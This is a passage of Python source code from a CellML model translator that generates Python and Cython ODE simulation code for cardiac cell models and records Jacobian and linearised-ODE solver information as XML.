vector_outputs.sort(key=lambda v: self.var_display_name(v))
self._vector_outputs[name] = vector_outputs
# Find model parameters that can be set from the protocol
self.cell_parameters = filter(
lambda v: v.is_modifiable_parameter,
cellml_metadata.find_variables(self.model,
('pycml:modifiable-parameter', NSS['pycml']),
'yes'))
self.cell_parameters.sort(key=lambda v: self.var_display_name(v))
for i, var in enumerate(self.cell_parameters):
# Remember the var's index
var._cml_param_index = i
self.param_vector_name = 'self.parameters'
def output_common_imports(self):
"""Output imports common to both Python and Cython code."""
self.output_doxygen('@file\n\n',
'This source file was generated from CellML.\n\n',
'Model: ', self.model.name, '\n\n',
version_comment(self.add_timestamp),
'\n\n<autogenerated>')
self.writeln()
self.writeln('import numpy as np')
self.writeln()
self.writeln('import fc.simulations.model as Model')
self.writeln('import fc.utility.environment as Env')
self.writeln('import fc.language.values as V')
self.writeln()
def output_common_constructor_content(self):
"""Output __init__ content common to both Python and Cython code."""
self.writeln('self.freeVariableName = "', self.var_display_name(self.free_vars[0]), '"')
self.writeln('self.freeVariable = 0.0')
self.writeln(self.vector_create('self.state', len(self.state_vars)))
self.writeln('self.stateVarMap = {}')
self.writeln(self.vector_create('self.initialState', len(self.state_vars)))
input_names = set() # Check for duplicates
for i, var in enumerate(self.state_vars):
for name in self.get_ontology_names(var, no_names_ok=True):
if name in input_names:
raise ValueError('Duplicate input variable name "' + name + '" found')
input_names.add(name)
self.writeln('self.stateVarMap["', name, '"] = ', i)
init_val = getattr(var, u'initial_value', None)
init_comm = ' # ' + var.fullname() + ' ' + var.units
if init_val is None:
init_comm += '; value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
self.writeln(self.vector_index('self.initialState', i), self.EQ_ASSIGN, init_val, init_comm)
self.writeln()
self.writeln('self.parameterMap = {}')
self.writeln(self.vector_create('self.parameters', len(self.cell_parameters)))
for var in self.cell_parameters:
for name in self.get_ontology_names(var):
if name in input_names:
raise ValueError('Duplicate input variable name "' + name + '" found')
input_names.add(name)
self.writeln('self.parameterMap["', name, '"] = ', var._cml_param_index)
self.writeln(self.vector_index('self.parameters', var._cml_param_index),
self.EQ_ASSIGN, var.initial_value, self.STMT_END, ' ',
self.COMMENT_START, var.fullname(), ' ', var.units)
# List outputs, and create objects for the GetOutputs method
self.writeln()
self.writeln('self.outputNames = []')
self.writeln('outputs = self._outputs = []')
output_names = set() # Check for duplicate local parts
for var in self._outputs:
# TODO: A later optimisation could look at which names the protocol actually uses, and only generate those.
for name in self.get_ontology_names(var):
if name in output_names:
raise ValueError('Duplicate output name "' + name + '" found')
output_names.add(name)
self.writeln('self.outputNames.append("', name, '")')
self.writeln('outputs.append(np.array(0.0))')
for name, vars in self._vector_outputs.iteritems():
if name in output_names:
raise ValueError('Duplicate output name "' + name + '" found')
output_names.add(name)
self.writeln('self.outputNames.append("', name, '")')
self.writeln('outputs.append(np.array([', ', '.join(['0.0'] * len(vars)), ']))')
self.writeln()
def output_top_boilerplate(self):
"""Output file content occurring before the model equations."""
self.analyse_model()
# Start file output
self.output_common_imports()
self.writeln('import math')
if self.options.numba:
self.writeln('import numba')
self.writeln('from numba import autojit, jit, void, double, object_')
self.writeln()
if self.options.numba:
self.writeln('@jit')
self.writeln('class ', self.class_name, '(Model.AbstractOdeModel):')
self.open_block()
# Constructor
if self.options.numba:
self.writeln('@void()')
self.writeln('def __init__(self):')
self.open_block()
self.output_common_constructor_content()
#2390 TODO: Units info
self.writeln('Model.AbstractOdeModel.__init__(self)')
self.close_block()
def output_state_assignments(self, nodeset, stateVectorName):
"""Assign state variables used by nodeset to local names."""
self.output_comment('State variables')
for i, var in enumerate(self.state_vars):
if var in nodeset:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(var), self.EQ_ASSIGN, self.vector_index(stateVectorName, i), self.STMT_END)
self.writeln()
def output_mathematics(self):
"""Output the mathematics in this model.
This just generates the ODE right-hand side function, EvaluateRhs(self, t, y)
"""
if self.options.numba:
self.writeln('@jit(double[:](object_, double, double[:], double[:]))')
self.writeln('def EvaluateRhs(self, ', self.code_name(self.free_vars[0]), ', y, ydot=np.empty(0)):')
self.open_block()
self.writeln('if ydot.size == 0:')
self.writeln(self.vector_create('ydot', len(self.state_vars)), indent_offset=1)
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), self.state_vars))
nodeset = self.calculate_extended_dependencies(derivs)
# Code to do the computation
self.output_state_assignments(nodeset, 'y')
self.output_comment('Mathematics')
self.output_equations(nodeset)
self.writeln()
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('ydot', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.writeln('return ydot')
self.close_block()
def output_bottom_boilerplate(self):
"""Output file content occurring after the model equations, i.e. the GetOutputs method."""
if self.options.numba:
self.writeln('@object_()')
self.writeln('def GetOutputs(self):')
self.open_block()
self.output_get_outputs_content()
self.close_block()
def get_ontology_names(self, var, no_names_ok=False):
"""Get the local names of this variable within any ontology annotations.
We look at all annotations of this variable using bqbiol:is, and if any of them occur within namespaces mapped
in the protocol, we extract the local part of the annotation URI, after the base defined by the protocol.
Returns a list of such names, raising an error if none exist, unless no_names_ok is True.
"""
names = []
name_uris = var.get_rdf_annotations(('bqbiol:is', NSS['bqbiol']))
for name_uri in name_uris:
# Iterate through possible URI bases to find which this one is part of
for uri_base in self.model._cml_protocol_namespaces.itervalues():
local_part = cellml_metadata.namespace_member(name_uri, uri_base, wrong_ns_ok=True)
if local_part:
names.append(local_part)
break # No other bases possible for this URI
if not names and not no_names_ok:
raise ValueError('No suitable name annotations found for variable ' + str(var))
return names
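# Illustrative example (hypothetical URIs): a variable annotated with
# bqbiol:is <https://example.org/onto#membrane_voltage>, where the
# protocol maps the base <https://example.org/onto#>, yields the local
# name 'membrane_voltage'.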
def output_get_outputs_content(self):
"""Output the content and open/close block for the GetOutputs method."""
# Figure out what equations are needed to compute the outputs
output_vars = set(self._outputs)
for vars in self._vector_outputs.itervalues():
output_vars.update(vars)
nodeset = self.calculate_extended_dependencies(output_vars)
# Do the calculations
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(self.free_vars[0]), self.EQ_ASSIGN, 'self.freeVariable')
self.output_state_assignments(nodeset, 'self.state')
self.output_comment('Mathematics computing outputs of interest')
self.output_equations(nodeset)
self.writeln()
# Put the results in a list to be returned to the caller
self.writeln('outputs = self._outputs')
output_count = 0
for var in self._outputs:
# TODO: A later optimisation could look at which names the protocol actually uses, and only generate those.
for name in self.get_ontology_names(var):
self.writeln('outputs[', output_count, '][()] = ', self.code_name(var))
output_count += 1
for name, vars in self._vector_outputs.iteritems():
for i, var in enumerate(vars):
self.writeln('outputs[', output_count, '][', i, '] = ', self.code_name(var))
output_count += 1
self.writeln('return outputs')
self.close_block()
class CellMLToCythonTranslator(CellMLToPythonTranslator):
"""Output Cython code suitable for the Python implementation of Functional Curation.
Unlike the base class, code generated by this translator can't inherit from a pure Python base class.
It also hardcodes using our Cython wrapper of CVODE as the solver.
Note that we use two types of vector in the generated code: numpy arrays, with the same names as for
CellMLToPythonTranslator, provide the same interface to the FC python code, while N_Vector views on the
same memory provide fast access for the ODE solver.
"""
USES_SUBSIDIARY_FILE = True
# TYPE_VECTOR = 'cdef Sundials.N_Vector'
# TYPE_VECTOR_REF = 'cdef Sundials.N_Vector'
TYPE_DOUBLE = 'cdef double '
TYPE_CONST_DOUBLE = 'cdef double '
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.pyx'
def subsidiary_file_name(self, output_filename):
"""Our subsidiary file is the setup.py used to build the extension."""
return output_filename, os.path.join(os.path.dirname(output_filename), 'setup.py')
# def vector_index(self, vector, i):
# """Return code for accessing the i'th index of vector."""
# return '(<Sundials.N_VectorContent_Serial>(' + vector + ').content).data[' + str(i) + ']'
#
# def vector_create(self, vector, size):
# """Return code for creating a new vector with the given size."""
# return ''.join(map(str, [self.TYPE_VECTOR, vector, self.EQ_ASSIGN,
# 'Sundials.N_VNew_Serial(', size, ')', self.STMT_END]))
#
# def vector_initialise(self, vector, size):
# """Return code for creating an already-declared vector with the given size."""
# return ''.join(map(str, [vector, self.EQ_ASSIGN, 'Sundials.N_VNew_Serial(', size, ')', self.STMT_END]))
def output_assignment(self, expr):
"""Output an assignment statement.
Avoids most of the magic in the Chaste version of this method, except for handling parameters specially.
"""
if isinstance(expr, cellml_variable) and expr in self.cell_parameters:
return
return CellMLTranslator.output_assignment(self, expr)
def output_top_boilerplate(self):
"""Output file content occurring before the model equations: basically just imports in this case.
The main RHS 'method' is actually a plain function so we can use it as a C callback.
"""
self.analyse_model()
self.write_setup_py()
# Start file output
self.writeln('# cython: profile=True')
self.output_common_imports()
self.writeln('cimport libc.math as math')
self.writeln('cimport numpy as np')
self.writeln('import os')
self.writeln('import shutil')
self.writeln('import sys')
self.writeln()
self.writeln('from fc.sundials.solver cimport CvodeSolver')
self.writeln('cimport fc.sundials.sundials as Sundials')
self.writeln('from fc.utility.error_handling import ProtocolError')
self.writeln()
def output_bottom_boilerplate(self):
"""Output file content occurring after the model equations, i.e. the model class."""
base_class = 'CvodeSolver'
self.writeln('cdef class ', self.class_name, '(', base_class, '):')
self.open_block()
# Declare member attributes. Note that state and _state come from the base class.
self.writeln('cdef public char* freeVariableName')
self.writeln('cdef public double freeVariable')
self.writeln('cdef public object stateVarMap')
self.writeln('cdef public np.ndarray initialState')
self.writeln('cdef public object parameterMap')
self.writeln('cdef public np.ndarray parameters')
self.writeln('cdef public object outputNames')
self.writeln()
self.writeln('cdef public object savedStates')
self.writeln('cdef public object env')
self.writeln('cdef public bint dirty')
self.writeln('cdef public char* outputPath')
self.writeln('cdef public object indentLevel')
self.writeln()
self.writeln('cdef public object _module')
self.writeln('cdef public object simEnv')
self.writeln()
self.writeln('cdef Sundials.N_Vector _parameters')
self.writeln('cdef public object _outputs')
self.writeln()
# Constructor
self.writeln('def __init__(self):')
self.open_block()
self.output_common_constructor_content()
self.writeln('self.state = self.initialState.copy()')
self.writeln('self.savedStates = {}')
self.writeln('self.dirty = False')
self.writeln('self.indentLevel = 0')
self.writeln('self.AssociateWithModel(self)')
self.writeln('self._parameters = Sundials.N_VMake_Serial(len(self.parameters), <Sundials.realtype*>(<np.ndarray>self.parameters).data)')
# TODO: Use a separate environment for each ontology
self.writeln('self.env = Env.ModelWrapperEnvironment(self)')
# Initialise CVODE
self.close_block()
self.writeln('def SetRhsWrapper(self):')
self.open_block()
self.writeln('flag = Sundials.CVodeInit(self.cvode_mem, _EvaluateRhs, 0.0, self._state)')
self.writeln('self.CheckFlag(flag, "CVodeInit")')
self.close_block()
# Cython-level destructor
self.writeln('def __dealloc__(self):')
self.open_block()
self.writeln('if self._parameters != NULL:')
self.writeln(' Sundials.N_VDestroy_Serial(self._parameters)')
self.close_block()
# Methods to match the AbstractModel class
self.writeln('def SetOutputFolder(self, path):')
self.open_block()
self.writeln("if os.path.isdir(path) and path.startswith('/tmp'):")
self.writeln('shutil.rmtree(path)', indent_offset=1)
self.writeln('os.mkdir(path)')
self.writeln('self.outputPath = path')
self.close_block()
self.writeln('def SetIndentLevel(self, indentLevel):')
self.open_block()
self.writeln('self.indentLevel = indentLevel')
self.close_block()
# Methods to match the AbstractOdeModel class
self.writeln('def SetSolver(self, solver):')
self.open_block()
self.writeln('print >>sys.stderr, " " * self.indentLevel, "SetSolver: Models implemented using Cython contain a built-in ODE solver, so ignoring setting."')
self.close_block()
self.writeln('def GetEnvironmentMap(self):')
self.open_block()
self.writeln('return {', nl=False)
# TODO: Use a separate env for each ontology
for i, prefix in enumerate(self.model._cml_protocol_namespaces.iterkeys()):
if i > 0:
self.write(', ')
self.write("'%s': self.env" % prefix)
self.writeln('}', indent=False)
self.close_block()
self.writeln('cpdef SetFreeVariable(self, double t):')
self.open_block()
self.writeln('self.freeVariable = t')
self.writeln(base_class, '.SetFreeVariable(self, t)')
self.close_block()
self.writeln('def SaveState(self, name):')
self.open_block()
self.writeln('self.savedStates[name] = self.state.copy()')
self.close_block()
self.writeln('cpdef ResetState(self, name=None):')
self.open_block()
self.writeln('if name is None:')
self.writeln(base_class, '.ResetSolver(self, self.initialState)', indent_offset=1)
self.writeln('else:')
self.writeln(base_class, '.ResetSolver(self, self.savedStates[name])', indent_offset=1)
self.close_block()
self.writeln('cpdef GetOutputs(self):')
self.open_block()
self.writeln('cdef np.ndarray[Sundials.realtype, ndim=1] parameters = self.parameters')
self.param_vector_name = 'parameters'
self.output_get_outputs_content()
self.param_vector_name = 'self.parameters'
self.close_block()
def output_mathematics(self):
"""Output the mathematics in this model.
This generates the ODE right-hand side function, "EvaluateRhs(self, t, y)", but as a C-style callback for CVODE.
"""
self.writeln('cdef int _EvaluateRhs(Sundials.realtype ', self.code_name(self.free_vars[0]),
', Sundials.N_Vector y, Sundials.N_Vector ydot, void* user_data):')
self.open_block()
self.writeln('model = <object>user_data')
self.writeln('cdef np.ndarray[Sundials.realtype, ndim=1] parameters = <np.ndarray>model.parameters')
self.param_vector_name = 'parameters'
# Work out what equations are needed to compute the derivatives
derivs = set(map(lambda v: (v, self.free_vars[0]), self.state_vars))
nodeset = self.calculate_extended_dependencies(derivs)
# Code to do the computation
self.output_comment('State variables')
for i, var in enumerate(self.state_vars):
if var in nodeset:
self.writeln(self.TYPE_DOUBLE, self.code_name(var), ' = (<Sundials.N_VectorContent_Serial>y.content).data[', i, ']')
self.writeln()
self.output_comment('Mathematics')
self.output_equations(nodeset)
self.writeln()
# Assign to derivatives vector
for i, var in enumerate(self.state_vars):
self.writeln('(<Sundials.N_VectorContent_Serial>ydot.content).data[', i, '] = ', self.code_name(var, True))
self.param_vector_name = 'self.parameters'
self.close_block()
def write_setup_py(self):
"""Write our subsidiary setup.py file for building the extension."""
self.out2.write("""
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy
ext_modules=[
Extension("%(filebase)s",
["%(filebase)s.pyx"],
include_dirs=[numpy.get_include(), '%(fcpath)s'],
#library_dirs=['%(fcpath)s/fc/sundials'],
libraries=['sundials_cvode', 'sundials_nvecserial', 'm'])
# users can set CFLAGS and LDFLAGS in their env if needed
]
setup(
name = "%(filebase)s",
cmdclass = {"build_ext": build_ext},
ext_modules = ext_modules
)
""" % {'filebase': os.path.splitext(os.path.basename(self.output_filename))[0],
'fcpath': os.path.join(os.path.dirname(__file__), '../../projects/FunctionalCuration/src/python')})
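# The generated setup.py is used in the usual Cython fashion, e.g.
#   python setup.py build_ext --inplace
# run from the directory containing the generated .pyx file.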
###############################################
# Register translation classes in this module #
###############################################
CellMLTranslator.register(CellMLTranslator, 'C++')
CellMLTranslator.register(CellMLToChasteTranslator, 'Chaste')
CellMLTranslator.register(CellMLToCvodeTranslator, 'CVODE')
CellMLTranslator.register(CellMLToMapleTranslator, 'Maple')
CellMLTranslator.register(CellMLToMatlabTranslator, 'Matlab')
CellMLTranslator.register(CellMLToHaskellTranslator, 'Haskell')
CellMLTranslator.register(CellMLToPythonTranslator, 'Python')
CellMLTranslator.register(CellMLToCythonTranslator, 'Cython')
class SolverInfo(object):
"""Add information for specialised translator classes into a model."""
def __init__(self, model, force=False):
"""Add information for the solvers as XML.
The Jacobian and linearity analyses store their results in
Python data structures as attributes of this object.
Transcribe these into XML in a child <solver_info> element.
If any of these elements exist in the model they will be left
unaltered, unless force is set to True.
This constructor just sets up the container element; call one
of the add_* methods to actually add the information to it.
"""
self._model = model
if force and hasattr(model, u'solver_info'):
model.xml_remove_child(model.solver_info)
if hasattr(model, u'solver_info'):
solver_info = model.solver_info
else:
solver_info = model.xml_create_element(u'solver_info', NSS[u'solver'])
model.xml_append(solver_info)
self._solver_info = solver_info
self._component = None
self._dt = None
def add_all_info(self):
"""Actually add the info."""
self.add_transmembrane_potential_name()
self.add_membrane_ionic_current()
self.add_linearised_odes()
self.add_jacobian_matrix()
self.add_dt_reference()
def add_dt_reference(self):
"""Add a reference to the variable representing dt."""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'dt'):
dt = self.get_dt()
elt = model.xml_create_element(u'dt', NSS[u'solver'], content=dt.fullname(cellml=True))
solver_info.xml_append(elt)
self._model._add_sorted_assignment(dt)
def add_transmembrane_potential_name(self):
"""The name of the transmembrane potential."""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'transmembrane_potential'):
v_elt = model.xml_create_element(
u'transmembrane_potential', NSS[u'solver'],
content=model._cml_transmembrane_potential.fullname())
solver_info.xml_append(v_elt)
def add_linearised_odes(self):
"""Linearised ODEs - where du/dt = g + hu (and g, h are not functions of u).
Structure looks like:
<linear_odes>
<math>
<apply><eq/>
<apply><diff/>
<bvar><ci>t</ci></bvar>
<ci>u</ci>
</apply>
<apply><plus/>
g
<apply><times/>
h
<ci>u</ci>
</apply>
</apply>
</apply>
.
.
.
</math>
</linear_odes>
"""
solver_info = self._solver_info
model = self._model
if not hasattr(solver_info, u'linear_odes') and model._cml_linear_update_exprs:
odes_elt = model.xml_create_element(u'linear_odes', NSS[u'solver'])
solver_info.xml_append(odes_elt)
odes_math = model.xml_create_element(u'math', NSS[u'm'])
odes_elt.xml_append(odes_math)
linear_vars = model._cml_linear_update_exprs.keys()
linear_vars.sort(key=lambda v: v.fullname())
free_var = model._cml_free_var
for var in linear_vars:
g, h = model._cml_linear_update_exprs[var]
hu = mathml_apply.create_new(model, u'times', [h, var.fullname()])
rhs = mathml_apply.create_new(model, u'plus', [g, hu])
odes_math.xml_append(mathml_diff.create_new(
model, free_var.fullname(), var.fullname(), rhs))
# Ensure that the model has a special component
self._get_special_component()
def _fix_jac_var_name(self, vname):
"""
If PE will be performed on a model with a single component, then we'll need full names in
the variable attributes.
"""
if vname[:4] == 'var_' and len(self._model.component) == 1 and not self._model.component.ignore_component_name:
name = unicode('var_' + self._model.component.name + '__' + vname[4:])
else:
name = unicode(vname)
return name
def add_jacobian_matrix(self):
"""Jacobian matrix elements.
Structure looks like:
<jacobian>
[<math> assignments of common sub-terms </math>]
<entry var_i='varname' var_j='varname'>
<math> apply|cn|ci ...</math>
</entry>
</jacobian>
"""
solver_info = self._solver_info
model = self._model
if model._cml_jacobian and model._cml_jacobian_full:
jac = model._cml_jacobian[1]
else:
# Old-style partial jacobian, or no jacobian
jac = model._cml_jacobian
if not hasattr(solver_info, u'jacobian') and jac:
jac_elt = model.xml_create_element(u'jacobian', NSS[u'solver'])
solver_info.xml_append(jac_elt)
if model._cml_jacobian_full:
# There may be temporaries
temporaries = model._cml_jacobian[0]
if temporaries:
jac_elt.xml_append(amara_parse_cellml(temporaries).math)
jac_vars = jac.keys()
jac_vars.sort() # Will sort by variable name
for v_i, v_j in jac_vars:
# Add (i,j)-th entry
attrs = {u'var_i': self._fix_jac_var_name(v_i),
u'var_j': self._fix_jac_var_name(v_j)}
entry = model.xml_create_element(u'entry', NSS[u'solver'], attributes=attrs)
jac_elt.xml_append(entry)
entry_doc = amara_parse_cellml(jac[(v_i, v_j)].xml())
entry.xml_append(entry_doc.math)
# Ensure that the model has a special component
self._get_special_component()
return
def use_canonical_variable_names(self):
"""
PE has just been performed, so we need to update variable names occurring outside
the modifiable mathematics sections.
"""
jac_elt = getattr(self._solver_info, u'jacobian', None)
for entry in getattr(jac_elt, u'entry', []):
for vlabel in ['var_i', 'var_j']:
vname = getattr(entry, vlabel)
var = self._get_variable(vname)
new_name = var.get_source_variable(recurse=True).fullname()
setattr(entry, vlabel, new_name)
dt_elt = getattr(self._solver_info, u'dt', None)
if dt_elt:
var = self._get_variable(unicode(dt_elt))
new_name = var.get_source_variable(recurse=True).fullname()
dt_elt.xml_remove_child(unicode(dt_elt))
dt_elt.xml_append(unicode(new_name))
def add_membrane_ionic_current(self):
"""Add ionic current information as XML for solvers to use."""
solver_info = self._solver_info
model = self._model
# The total ionic current. This relies on having a configuration store.
if hasattr(model.xml_parent, '_cml_config') and not hasattr(solver_info, u'ionic_current'):
conf = model.xml_parent._cml_config
if conf.i_ionic_vars:
ionic_elt = model.xml_create_element(u'ionic_current', NSS[u'solver'])
# Adds each ionic var to the xml doc from the config store
for var in conf.i_ionic_vars:
varelt = model.xml_create_element(u'var', NSS[u'solver'],
content=var.fullname())
ionic_elt.xml_append(varelt)
solver_info.xml_append(ionic_elt)
return
def add_linear_ode_update_equations(self):
"""Add the update equations for the linear ODEs.
A linear ODE has the form du/dt = g+h.u where g & h are not functions of u. The
update expression then looks like u = (u + g.dt)/(1 - h.dt).
This replaces the linear_odes block with the structure:
<linear_odes>
<math>
<ci>u</ci>
<ci>t</ci>
<apply> <!-- (u + g.dt)/(1 - h.dt) --> </apply>
</math>
.
.
.
</linear_odes>
"""
block = getattr(self._solver_info, u'linear_odes', None)
dt = self._model.get_config().dt_variable.fullname() # was dt = u'delta_t'
# Add the new equations
for u, t, gh in self.get_linearised_odes():
g, h = gh
g.safe_remove_child(g, g.xml_parent)
g_dt = mathml_apply.create_new(block, u'times', [g, dt])
numer = mathml_apply.create_new(block, u'plus', [u.fullname(), g_dt])
h.safe_remove_child(h, h.xml_parent)
h_dt = mathml_apply.create_new(block, u'times', [h, dt])
denom = mathml_apply.create_new(block, u'minus', [(u'1', u'dimensionless'), h_dt])
eqn = mathml_apply.create_new(block, u'divide', [numer, denom])
math = block.xml_create_element(u'math', NSS[u'm'])
math.xml_append(mathml_ci.create_new(block, u.fullname()))
math.xml_append(mathml_ci.create_new(block, t.fullname()))
math.xml_append(eqn)
block.xml_append(math)
self._add_variable_links(math)
# Remove the old equations (first math element)
block.xml_remove_child(block.math)
def add_variable_links(self):
"""Link ci elements in the added XML to cellml_variable objects.
This analyses the names in the ci elements to determine which variable in
the model they refer to.
"""
self._process_mathematics(self._add_variable_links)
#1795 - classify temporary variables for the Jacobian matrix, and append
# to the main list of assignments in the model
solver_info = self._solver_info
if hasattr(solver_info, u'jacobian') and hasattr(solver_info.jacobian, u'math'):
for elt in solver_info.jacobian.math.apply:
elt.classify_variables(root=True)
for elt in solver_info.jacobian.math.apply:
self._model.topological_sort(elt)
#2418 - check if any state variables have been units-converted
self._check_state_var_units_conversions()
def _check_state_var_units_conversions(self):
"""Check if any Jacobian entries need to be altered because the units of state variables have changed.
If any variable considered a state variable by the Jacobian is now of type Computed then it has been
converted. We figure out the conversion factor, update the Jacobian to reference the new state variable,
and units-convert the derivative.
"""
if not hasattr(self._solver_info, u'jacobian'):
return
# Helper methods
def set_var_values(elt, vars=None):
"""Fake all variables appearing in the given expression being set to 1.0, and return them."""
if vars is None:
vars = []
if isinstance(elt, mathml_ci):
elt.variable.set_value(1.0)
vars.append(elt.variable)
else:
for child in getattr(elt, 'xml_children', []):
set_var_values(child, vars)
return vars
# Find any converted state variables
converted_state_vars = set()
for entry in getattr(self._solver_info.jacobian, u'entry', []):
var = self._get_variable(entry.var_i)
if var.get_type() == VarTypes.Computed:
converted_state_vars.add(var)
if not converted_state_vars:
return
# Figure out the conversion factor in each case
state_var_map = {}
for var in converted_state_vars:
defn = var.get_dependencies()[0]
defn_vars = set_var_values(defn.eq.rhs)
assert len(defn_vars) == 1, "Unexpected form of units conversion expression found"
factor = defn.eq.rhs.evaluate()
state_var_map[var] = (defn_vars[0], factor)
defn_vars[0].unset_values()
# Apply the conversion to relevant Jacobian entries
for entry in getattr(self._solver_info.jacobian, u'entry', []):
factor = 1
var_i = self._get_variable(entry.var_i)
if var_i in converted_state_vars:
var_i, factor_i = state_var_map[var_i]
var_i = var_i.get_source_variable(recurse=True)
entry.var_i = unicode(var_i.fullname())
factor /= factor_i
var_j = self._get_variable(entry.var_j)
if var_j in converted_state_vars:
var_j, factor_j = state_var_map[var_j]
var_j = var_j.get_source_variable(recurse=True)
entry.var_j = unicode(var_j.fullname())
factor *= factor_j
if factor != 1:
# Replace rhs with rhs * factor
rhs = list(entry.math.xml_element_children())[0]
entry.math.safe_remove_child(rhs)
new_rhs = mathml_apply.create_new(entry, 'times', [(factor, 'dimensionless'), rhs])
entry.math.xml_append(new_rhs)
def do_binding_time_analysis(self):
"""Do a binding time analysis on the additional mathematics.
This requires self.add_variable_links to have been called already.
"""
self._process_mathematics(lambda elt: elt._get_binding_time())
def _process_mathematics(self, func):
"""Apply func to each top-level mathematical construct in the solver info blocks.
func must be able to accept mathml_piecewise, mathml_apply, mathml_ci and mathml_cn elements.
"""
solver_info = self._solver_info
# Jacobian
if hasattr(solver_info, u'jacobian'):
if hasattr(solver_info.jacobian, u'math'):
for elt in solver_info.jacobian.math.apply:
func(elt)
for entry in solver_info.jacobian.entry:
for elt in entry.math.xml_element_children():
func(elt)
# Linearised ODEs
if hasattr(solver_info, u'linear_odes'):
for math in solver_info.linear_odes.math:
for elt in math.xml_element_children():
func(elt)
def has_modifiable_mathematics(self):
"""Check if the solver info blocks contain any modifiable mathematics."""
try:
self.get_modifiable_mathematics().next()
return True
except StopIteration:
return False
def get_modifiable_mathematics(self):
"""Get an iterable over mathematical constructs in the solver info blocks that can be changed.
Returned elements will be mathml_piecewise, mathml_apply, mathml_ci or mathml_cn instances.
"""
solver_info = self._solver_info
# Jacobian - entry definitions and temporaries can be changed
if hasattr(solver_info, u'jacobian'):
if hasattr(solver_info.jacobian, u'math'):
for elt in solver_info.jacobian.math.apply:
yield elt
for entry in solver_info.jacobian.entry:
for elt in entry.math.xml_element_children():
yield elt
# Linearised ODEs - only g & h can be changed
if hasattr(solver_info, u'linear_odes'):
for _, _, eqns in self.get_linearised_odes():
for eqn in eqns:
yield eqn
def get_linearised_odes(self):
"""Return an iterable over the linearised ODEs, i.e. ODEs of the form
du/dt = g + hu (with g, h not functions of u).
Yields tuples (u, t, eqns) where the form of eqns depends on whether
add_linear_ode_update_equations has been called. If so, it is a 1-tuple
containing the update equation; if not, it is (g,h).
"""
if hasattr(self._solver_info, u'linear_odes'):
if hasattr(self._solver_info.linear_odes.math, u'ci'):
for math in self._solver_info.linear_odes.math:
u, t, eqn = list(math.xml_element_children())
u = u.variable
t = t.variable
yield (u, t, (eqn,))
else:
for ode in self._solver_info.linear_odes.math.apply:
u = ode.apply.ci.variable
t = ode.apply.bvar.ci.variable
opers = ode.apply[1].operands()
g = opers.next()
h = opers.next().operands().next()
yield (u, t, (g,h))
def _add_variable_links(self, elt):
"""Recursively link ci elements in the given XML tree to cellml_variable objects.
Also sets component links: for ci elements, to the component containing the linked
variable, and for cn elements, to the first component in the model.
"""
if isinstance(elt, mathml_ci):
var = self._get_variable(unicode(elt))
elt._cml_variable = var
elt._cml_component = var.component
elif isinstance(elt, mathml_cn):
# Fake a component, since it doesn't really have one
elt._cml_component = elt.model.component
elif hasattr(elt, 'xml_children'):
for child in elt.xml_children:
self._add_variable_links(child)
_jac_temp_re = re.compile(r't[0-9]+')
def _get_variable(self, varname):
"""Return the variable in the model with name varname."""
try:
if varname == 'delta_t':
# Special case for the timestep in ComputeJacobian and elsewhere
var = self.get_dt()
elif self._jac_temp_re.match(varname):
var = self._get_special_variable(varname, VarTypes.Unknown)
else:
var = cellml_variable.get_variable_object(self._model, varname)
except KeyError:
raise ValueError("Cannot find variable '%s' referenced in SolverInfo" % varname)
return var
def create_dt(self, modifier, comp, units):
"""Create the special 'dt' variable in the given component."""
self._dt = modifier.add_variable(comp, modifier._uniquify_var_name(u'dt', comp), units)
self._dt._set_type(VarTypes.Free)
return self._dt
def get_dt(self):
"""Get or create a special 'dt' variable."""
if not self._dt:
self._dt = self._get_special_variable(u'dt', VarTypes.Free)
return self._dt
def _get_special_variable(self, varname, ptype=VarTypes.Unknown):
"""Get or create a special variable object that doesn't really exist in the model."""
comp = self._get_special_component()
try:
var = comp.get_variable_by_name(varname)
except KeyError:
var = cellml_variable.create_new(self._model, varname, u'dimensionless')
comp._add_variable(var)
var._set_type(ptype)
return var
def _get_special_component(self):
"""Get or create a special component for containing special variables."""
if not self._component:
self._component = cellml_component.create_new(self._model, u'')
self._model._add_component(self._component, special=True)
return self._component
class ConfigurationStore(object):
"""
A container for configuration information, read in from XML
configuration files. The file structure is described in the
read_configuration_file method.
"""
def __init__(self, doc, options=None):
"""Create a new store.
doc specifies a CellML document, the processing of which this configuration store will affect.
If given, options should be an optparse.Values instance containing command-line options.
"""
self.doc = doc
doc._cml_config = self
self.options = options
self.unit_definitions = cellml_component.create_new(doc.model, '*lookup_table_units*')
self.unit_definitions.xml_parent = doc.model # Needed for looking up standard units
# Transmembrane potential
self.V_definitions = [u'membrane,V']
self.V_variable = None
# Membrane capacitance
self.Cm_definitions = []
self.Cm_variable = None
# Lookup table configuration
self.lut_config = {}
# Ionic currents configuration
self.i_stim_definitions = [u'membrane,i_Stim']
self.i_stim_var = None
self.i_ionic_definitions = [u'membrane,i_.*']
self.i_ionic_vars = []
# Whether GetIIonic will need to negate the sum of i_ionic_vars
self.i_ionic_negated = False
# Whether the stimulus magnitude is positive, rather than negative
self.i_stim_negated = False
# Other variables that may be set by other code, for example an InterfaceGenerator
self.dt_variable = None
self.i_data_clamp_current = None
self.i_data_clamp_conductance = None
return
def read_configuration_file(self, config_file):
"""Read configuration stored in config_file.
The configuration file is expected to be XML, conforming to
the following structure. Currently little checking is done on
the file format; incorrectly formatted files are unlikely to
give particularly helpful error messages.
The root element may contain a 'global' element, giving global
configuration options. These include:
* 'lookup_tables'
Contains one or more 'lookup_table' elements, one for each
type of lookup table available. These contain (a selection of)
the elements:
* 'var' - the variable to key on. The component name given
should be that from which the variable is exported. Must be
present.
* 'min', 'max', 'step' - table bounds parameters. Optional.
Default values are used for parameters that are not present.
* 'currents'
Defines which variables hold the ionic and stimulus currents,
if any. It contains 2 elements:
* 'stimulus' - the full name of the stimulus current variable
* 'ionic_match' - a regular expression matching full names of
